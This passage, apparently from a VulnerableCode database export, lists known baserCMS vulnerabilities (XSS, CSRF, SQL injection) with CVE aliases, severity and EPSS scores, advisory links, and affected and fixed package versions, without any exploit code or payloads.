vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0569, GHSA-6j3p-vrph-j7qq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-e4xa-jm9u-nked
15
url VCID-eq7f-n3g5-s3hu
vulnerability_id VCID-eq7f-n3g5-s3hu
summary
Cross-site Scripting
Improper neutralization of JavaScript input in the page editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
reference_id CVE-2021-20681
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20681, GHSA-24p5-x9f9-vvpx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eq7f-n3g5-s3hu
16
url VCID-erav-4pk1-wfhc
vulnerability_id VCID-erav-4pk1-wfhc
summary
Cross-Site Request Forgery (CSRF)
Cross-site request forgery (CSRF) vulnerability in the baserCMS Mail plugin allows remote attackers to hijack the authentication of administrators via unspecified vectors.
references
0
reference_url http://basercms.net/security/JVN92765814
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://basercms.net/security/JVN92765814
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-4879
reference_id
reference_type
scores
0
value 0.00121
scoring_system epss
scoring_elements 0.30744
published_at 2026-06-05T12:55:00Z
1
value 0.00121
scoring_system epss
scoring_elements 0.30671
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-4879
2
reference_url https://jvn.jp/en/jp/JVN92765814/index.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN92765814/index.html
3
reference_url https://web.archive.org/web/20210308130052/http://www.securityfocus.com/bid/93217
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20210308130052/http://www.securityfocus.com/bid/93217
4
reference_url http://www.securityfocus.com/bid/93217
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/93217
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-4879
reference_id CVE-2016-4879
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-4879
6
reference_url https://github.com/advisories/GHSA-397g-4jpj-44xg
reference_id GHSA-397g-4jpj-44xg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-397g-4jpj-44xg
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.10.1
purl pkg:composer/baserproject/basercms@3.0.10.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-ffq1-r9ck-1bhp
17
vulnerability VCID-g56w-z9cx-5ygv
18
vulnerability VCID-ga9u-uv9b-tydr
19
vulnerability VCID-ggv8-3v9t-mfea
20
vulnerability VCID-gsg3-fdmu-vqag
21
vulnerability VCID-guvm-x5jc-mfgc
22
vulnerability VCID-hpk4-a6tr-3ffe
23
vulnerability VCID-j37y-gws9-ake9
24
vulnerability VCID-jby7-s5ez-dqb3
25
vulnerability VCID-k575-suuf-7bhf
26
vulnerability VCID-k5qv-4yp3-zbgf
27
vulnerability VCID-khft-xvrw-g3dr
28
vulnerability VCID-kmpp-6j49-pqfz
29
vulnerability VCID-mfm9-gsh3-ubg8
30
vulnerability VCID-nxrf-64er-xbfx
31
vulnerability VCID-p695-t9ye-v3ga
32
vulnerability VCID-p6nr-eu91-53b4
33
vulnerability VCID-pd8c-9d7z-zkhg
34
vulnerability VCID-r4jc-22rq-d3cb
35
vulnerability VCID-sqr4-v889-tff8
36
vulnerability VCID-u16w-rbuk-ybfs
37
vulnerability VCID-uedz-j2vn-cbea
38
vulnerability VCID-vqx2-hzju-r7et
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-y2sz-c6vb-pkdp
41
vulnerability VCID-y9f3-k7xk-rucf
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.10.1
1
url pkg:composer/baserproject/basercms@3.0.11
purl pkg:composer/baserproject/basercms@3.0.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-ffq1-r9ck-1bhp
17
vulnerability VCID-g56w-z9cx-5ygv
18
vulnerability VCID-ga9u-uv9b-tydr
19
vulnerability VCID-ggv8-3v9t-mfea
20
vulnerability VCID-gsg3-fdmu-vqag
21
vulnerability VCID-guvm-x5jc-mfgc
22
vulnerability VCID-hpk4-a6tr-3ffe
23
vulnerability VCID-j37y-gws9-ake9
24
vulnerability VCID-jby7-s5ez-dqb3
25
vulnerability VCID-k575-suuf-7bhf
26
vulnerability VCID-k5qv-4yp3-zbgf
27
vulnerability VCID-khft-xvrw-g3dr
28
vulnerability VCID-kmpp-6j49-pqfz
29
vulnerability VCID-mfm9-gsh3-ubg8
30
vulnerability VCID-nxrf-64er-xbfx
31
vulnerability VCID-p695-t9ye-v3ga
32
vulnerability VCID-p6nr-eu91-53b4
33
vulnerability VCID-pd8c-9d7z-zkhg
34
vulnerability VCID-r4jc-22rq-d3cb
35
vulnerability VCID-sqr4-v889-tff8
36
vulnerability VCID-u16w-rbuk-ybfs
37
vulnerability VCID-uedz-j2vn-cbea
38
vulnerability VCID-vqx2-hzju-r7et
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-y2sz-c6vb-pkdp
41
vulnerability VCID-y9f3-k7xk-rucf
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.11
aliases CVE-2016-4879, GHSA-397g-4jpj-44xg
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-erav-4pk1-wfhc
17
url VCID-ffq1-r9ck-1bhp
vulnerability_id VCID-ffq1-r9ck-1bhp
summary
SQL Injection
Baser CMS contains a SQL injection vulnerability.
references
0
reference_url http://jvn.jp/en/jp/JVN78151490/index.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN78151490/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10842
reference_id
reference_type
scores
0
value 0.0067
scoring_system epss
scoring_elements 0.7178
published_at 2026-06-05T12:55:00Z
1
value 0.0067
scoring_system epss
scoring_elements 0.7174
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10842
2
reference_url https://basercms.net/security/JVN78151490
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN78151490
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10842
reference_id CVE-2017-10842
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10842
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.15
purl pkg:composer/baserproject/basercms@3.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-u16w-rbuk-ybfs
35
vulnerability VCID-uedz-j2vn-cbea
36
vulnerability VCID-vqx2-hzju-r7et
37
vulnerability VCID-xpsb-2yux-g3cf
38
vulnerability VCID-y2sz-c6vb-pkdp
39
vulnerability VCID-yesf-qxgy-3ygx
40
vulnerability VCID-zqd4-rdem-jfgk
41
vulnerability VCID-zsgc-fnen-b7a6
42
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.15
1
url pkg:composer/baserproject/basercms@4.0.5.1
purl pkg:composer/baserproject/basercms@4.0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1
2
url pkg:composer/baserproject/basercms@4.0.6
purl pkg:composer/baserproject/basercms@4.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6
aliases CVE-2017-10842, GHSA-jc94-wp59-pq4f
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ffq1-r9ck-1bhp
18
url VCID-g56w-z9cx-5ygv
vulnerability_id VCID-g56w-z9cx-5ygv
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
reference_id
reference_type
scores
0
value 0.0055
scoring_system epss
scoring_elements 0.68361
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
1
reference_url https://basercms.net/security/JVN_45547161
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://basercms.net/security/JVN_45547161
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
6
reference_url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0-beta1
purl pkg:composer/baserproject/basercms@5.0.0-beta1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1
aliases CVE-2023-29009, GHSA-8vqx-prq4-rqrq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv
19
url VCID-ga9u-uv9b-tydr
vulnerability_id VCID-ga9u-uv9b-tydr
summary
Cross-site Scripting
Cross-site scripting vulnerability in baserCMS allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0570
reference_id
reference_type
scores
0
value 0.00195
scoring_system epss
scoring_elements 0.4131
published_at 2026-06-05T12:55:00Z
1
value 0.00195
scoring_system epss
scoring_elements 0.41234
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0570
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
